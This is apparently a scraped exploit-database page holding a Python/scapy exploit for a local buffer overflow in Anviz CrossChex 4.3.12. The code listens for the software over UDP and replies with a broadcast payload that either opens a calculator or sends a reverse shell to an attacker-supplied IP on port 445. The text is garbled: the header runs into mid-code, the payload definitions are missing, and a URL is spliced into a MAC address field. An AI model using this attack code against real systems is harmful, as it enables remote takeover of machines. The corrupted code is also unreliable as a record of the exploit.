Anviz CrossChex 4.3.12 – Local Buffer Overflow

# Exploit Title: Anviz CrossChex 4.3.12 - Local Buffer Overflow
# Date: 2019-11-30
# Exploit Author: Luis Catarino & Pedro Rodrigues
# Vendor Homepage: https://www.anviz.com/
# Software Link: https://www.anviz.com/download.html
# Version: Crosschex Standard x86  2:
      request = request + shell_payload_1 + ipToShellcode(sys.argv[2]) + shell_payload_2
    else:
      request = request + calculator_payload

    scapy.all.sendp( Ether(src="http://www.exploit-db.com/00:00:00:00:00:00", dst="ff:ff:ff:ff:ff:ff")/IP(src=ip,dst='255.255.255.255')/UDP(sport=sport,dport=dport)/Raw(load=request),  iface=sys.argv[1] )

def setFuzzUDPServer(ip='', port=5050, timeout=150):
    try :
    	s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    except:
    	print('[!] Failed to create server socket')

    try:
    	s.bind(('', port))
    except:
    	print('[*] Server socket bind failed')
    	sys.exit()

    print('[*] Waiting for crosschex')
    s.settimeout(timeout)
    timeout = time.time() + timeout
    responses = []

    while True:
        if time.time() > timeout:
            break
        try:
            response = s.recvfrom(1024)
            print(response)
            responses.append(response)
            sendFuzzingUDPBroadcast(ip=ip)
            response = s.recvfrom(1024)            
        except socket.timeout:
            print("[!] Error with UDP server")

    s.close()
    return responses

nargs = len(sys.argv)

if nargs < 2:
  print("[*] Usage: python3 %s  []ntif you don't pass the ip of the LHOST it will drop a calculator, if you set the ip it will send a reverse shell to port 445")
  sys.exit(0)

setFuzzUDPServer()
            

Comments are closed.